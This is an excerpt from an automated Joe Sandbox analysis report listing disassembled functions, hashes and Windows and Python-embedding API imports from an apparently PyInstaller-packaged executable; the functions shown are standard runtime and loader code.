Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: 26bb0d68ac65fb9d66fbb89b2b09f199346183c4cdde6b475d7ef10d2360eb1c
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: F821D411F1C64282EBD277619598379D6829F8E7A4FD84239D93E4F3C2EE6CA44483F0

Function 00007FF7FD74BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD74BF44

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: 2af047343c406df8aaae5680997cd0b7d48f8690d0fe5e4c31a49fd0cd377dfc
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: 1241A732A1C201C7EB35AA19A54427DB7A4EF5AB45F900131DAAD4B6D1EF2DE402CBF1

Function 00007FF7FD737F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF7FD73802A

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 8334f334696440ef64ed4453da584d980c1c0ded1461c6629ef7e16216bca0a0
Instruction ID: ee14c8cb10219036a6b6aca3031c24eaf451426529d7d0299a16ea35f74ffab7
Opcode Fuzzy Hash: 8334f334696440ef64ed4453da584d980c1c0ded1461c6629ef7e16216bca0a0
Instruction Fuzzy Hash: C8216121B0C65186EB11AB1265043BAD651BF4ABC8FCC5430EE6D0B7C6EEBEE14196F0

Function 00007FF7FD74B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD74BA32

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
Instruction ID: 25c023af3ca79d1d6c68a2e6f850ecad1c523c1ef341d49b80efaa0fd8ff14ca
Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
Instruction Fuzzy Hash: 8731A121A1CA42C5F7527B55884937CA650AF4AB98FC60135E93D0B3D2EFBCE84187F0

Function 00007FF7FD7499D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7FD7499FF

Part of subcall function 00007FF7FD749AF8: GetModuleHandleExW.KERNEL32 ref: 00007FF7FD749B1D
Part of subcall function 00007FF7FD749AF8: GetProcAddress.KERNEL32 ref: 00007FF7FD749B33
Part of subcall function 00007FF7FD749AF8: FreeLibrary.KERNEL32 ref: 00007FF7FD749B5A

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction ID: 0fe8c813730294d4d3537a889201d7f590b8884dd34f2f3693eadaa008a1648f
Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction Fuzzy Hash: 51217F32B0D781CAEB66AF64C4482FC77A4EB49718F940639D62D0AAD5EF38D544C7E0

Function 00007FF7FD746004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD745F69

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 0585f4896c86fb47b208ae85959f62baa2bc13dd2eafb33b678e1ed2c98387a2
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: 41113A22A1C642C2EB63BE51940417EE264AF4AB84FD54031EA5C5BAD6EF7CD50087F1

Function 00007FF7FD7563C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD7563E7

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: ed9925138f1358434fab2121980ec42c7e7438f8d89c6b0614f2b17e118dc788
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: EA21987261C64186DB619F18D44037EB660FB89B94F944234E66D4B6D5EF3CD4018BA0

Function 00007FF7FD74042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD740480

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 8dc705a8e19fca150f9f319d9f778d6c6dc890b074c6029b8811708843bd2387
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: D7018622A0C74180EB05BF569905169E691AF8BFE0B984531DE7C1BBD6EE3CE01157E0

Function 00007FF7FD747F6C Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD747FAA

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: fc3cc904b03b2a0a462270bd32b9568146bb9d8bd979ac04812cc4cde4b7db8e
Instruction ID: 21f3e68c44c052522f79873f88eebea7c2580b5a431ac791d9025515d8413775
Opcode Fuzzy Hash: fc3cc904b03b2a0a462270bd32b9568146bb9d8bd979ac04812cc4cde4b7db8e
Instruction Fuzzy Hash: 46016D20A1D642C0FBA27B21A509179E190AF0F794FD84535EA3C4E6C6FF2CA44282F1

Function 00007FF7FD7482A8 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD7482C1

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction ID: eb555d306f2410886f853e755ef5075ccd5e3e8f86bd11b2da9e6f69f5da6fd7
Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction Fuzzy Hash: 08E0ECA1E0CA0BC7FB163BA5458A279D1505F5F344FD54430E9381E2C7FE6C684966F1

Function 00007FF7FD74D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF7FD740D00,?,?,?,00007FF7FD74236A,?,?,?,?,?,00007FF7FD743B59), ref: 00007FF7FD74D6AA

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: 7fc8f2ee4b1641adca4c2bf70740592da4c857d45ac39aae812cf612aa983cb0
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: 6FF03A00A0D202C4FB567A62580927592905F5EBF0F880634DD7E4E2D5FE2CA44082F2

Non-executed Functions

Function 00007FF7FD73D19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7FD73D1B8
RtlCaptureContext.KERNEL32 ref: 00007FF7FD73D1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7FD73D1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF7FD73D240
IsDebuggerPresent.KERNEL32 ref: 00007FF7FD73D294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7FD73D2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7FD73D2BC

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: c70b516ab2ed10c744ccd03027008c09adf792479a8373ec4d11702b2a03f078
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: 11311072A0CA8186EB609F60E8807FE7365FB88744F444439DA5D4BB94EF78D548C7B1

Function 00007FF7FD74A684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7FD74A6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7FD74A715
RtlVirtualUnwind.KERNEL32 ref: 00007FF7FD74A750
IsDebuggerPresent.KERNEL32 ref: 00007FF7FD74A789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7FD74A793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7FD74A79E

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: 3a80c898d4f54d80de7843f5c62325874ee4ccd6a0cfc2164faa2dc7be93ef37
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: AB31533261CB8186D7609F25E8443AEB3A4FB89758F940135EAAD4BB94EF3CD14587A0

Function 00007FF7FD7518E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD751930
FindFirstFileExW.KERNEL32 ref: 00007FF7FD751A3A

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
Instruction ID: d5a8905a80b65060769db4e0d49fa42e0f59a3b6ed01578672daf20dc6efd8c4
Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
Instruction Fuzzy Hash: E4B18226B1C69281EF61AB6194042B9B351EB49BE5F944132DE6D0BBC9FE3CE44183F1

Function 00007FF7FD735820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD735830
GetLastError.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD735842
GetProcAddress.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD735879
GetLastError.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD73588B
GetProcAddress.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD7358A4
GetLastError.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD7358B6
GetProcAddress.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD7358CF
GetLastError.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD7358E1
GetProcAddress.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD7358FD
GetLastError.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD73590F
GetProcAddress.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD73592B
GetLastError.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD73593D
GetProcAddress.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD735959
GetLastError.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD73596B
GetProcAddress.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD735987
GetLastError.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD735999
GetProcAddress.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD7359B5
GetLastError.KERNEL32(?,00007FF7FD7364BF,?,00007FF7FD73336E), ref: 00007FF7FD7359C7

Strings

PyModule_GetDict, xrefs: 00007FF7FD735CB9, 00007FF7FD735CDB
PyErr_NormalizeException, xrefs: 00007FF7FD735AED, 00007FF7FD735B0F
PyUnicode_Replace, xrefs: 00007FF7FD735FC7, 00007FF7FD735FE9
PyImport_AddModule, xrefs: 00007FF7FD735BD3, 00007FF7FD735BF5
Py_InitializeFromConfig, xrefs: 00007FF7FD7358F3, 00007FF7FD735915
PyUnicode_Join, xrefs: 00007FF7FD735F99, 00007FF7FD735FBB
Py_IsInitialized, xrefs: 00007FF7FD735921, 00007FF7FD735943
PyUnicode_DecodeFSDefault, xrefs: 00007FF7FD735F0F, 00007FF7FD735F31
PyErr_Restore, xrefs: 00007FF7FD735B77, 00007FF7FD735B99
PyConfig_SetBytesString, xrefs: 00007FF7FD735A07, 00007FF7FD735A29
Py_Finalize, xrefs: 00007FF7FD7358C5, 00007FF7FD7358E7
PySys_SetObject, xrefs: 00007FF7FD735E85, 00007FF7FD735EA7
Py_ExitStatusException, xrefs: 00007FF7FD73589A, 00007FF7FD7358BC
PyConfig_Read, xrefs: 00007FF7FD7359D9, 00007FF7FD7359FB
PyImport_ExecCodeModule, xrefs: 00007FF7FD735C01, 00007FF7FD735C23
PyErr_Print, xrefs: 00007FF7FD735B49, 00007FF7FD735B6B
Py_DecodeLocale, xrefs: 00007FF7FD73586F, 00007FF7FD735891
PyEval_EvalCode, xrefs: 00007FF7FD735BA5, 00007FF7FD735BC7
PyConfig_InitIsolatedConfig, xrefs: 00007FF7FD7359AB, 00007FF7FD7359CD
PyUnicode_FromString, xrefs: 00007FF7FD735F6B, 00007FF7FD735F8D
PyObject_GetAttrString, xrefs: 00007FF7FD735D43, 00007FF7FD735D65
PyConfig_SetString, xrefs: 00007FF7FD735A35, 00007FF7FD735A57
Py_PreInitialize, xrefs: 00007FF7FD73594F, 00007FF7FD735971
PyConfig_SetWideStringList, xrefs: 00007FF7FD735A63, 00007FF7FD735A85
PyMem_RawFree, xrefs: 00007FF7FD735C8B, 00007FF7FD735CAD
PyErr_Occurred, xrefs: 00007FF7FD735B1B, 00007FF7FD735B3D
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF7FD735DCD, 00007FF7FD735DEF
PyObject_CallFunction, xrefs: 00007FF7FD735CE7, 00007FF7FD735D09
PyObject_SetAttrString, xrefs: 00007FF7FD735D71, 00007FF7FD735D93
PyUnicode_FromFormat, xrefs: 00007FF7FD735F3D, 00007FF7FD735F5F
PyRun_SimpleStringFlags, xrefs: 00007FF7FD735DFB, 00007FF7FD735E1D
PyImport_ImportModule, xrefs: 00007FF7FD735C2F, 00007FF7FD735C51
Failed to get address for %hs, xrefs: 00007FF7FD735851
PyUnicode_Decode, xrefs: 00007FF7FD735EE1, 00007FF7FD735F03
PyConfig_Clear, xrefs: 00007FF7FD73597D, 00007FF7FD73599F
PySys_GetObject, xrefs: 00007FF7FD735E57, 00007FF7FD735E79
Py_DecRef, xrefs: 00007FF7FD735826, 00007FF7FD735848
GetProcAddress, xrefs: 00007FF7FD735858
PyMarshal_ReadObjectFromString, xrefs: 00007FF7FD735C5D, 00007FF7FD735C7F
PyObject_Str, xrefs: 00007FF7FD735D9F, 00007FF7FD735DC1
PyErr_Clear, xrefs: 00007FF7FD735A91, 00007FF7FD735AB3
PyErr_Fetch, xrefs: 00007FF7FD735ABF, 00007FF7FD735AE1
PyObject_CallFunctionObjArgs, xrefs: 00007FF7FD735D15, 00007FF7FD735D37
PyUnicode_AsUTF8, xrefs: 00007FF7FD735EB3, 00007FF7FD735ED5
PyStatus_Exception, xrefs: 00007FF7FD735E29, 00007FF7FD735E4B

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
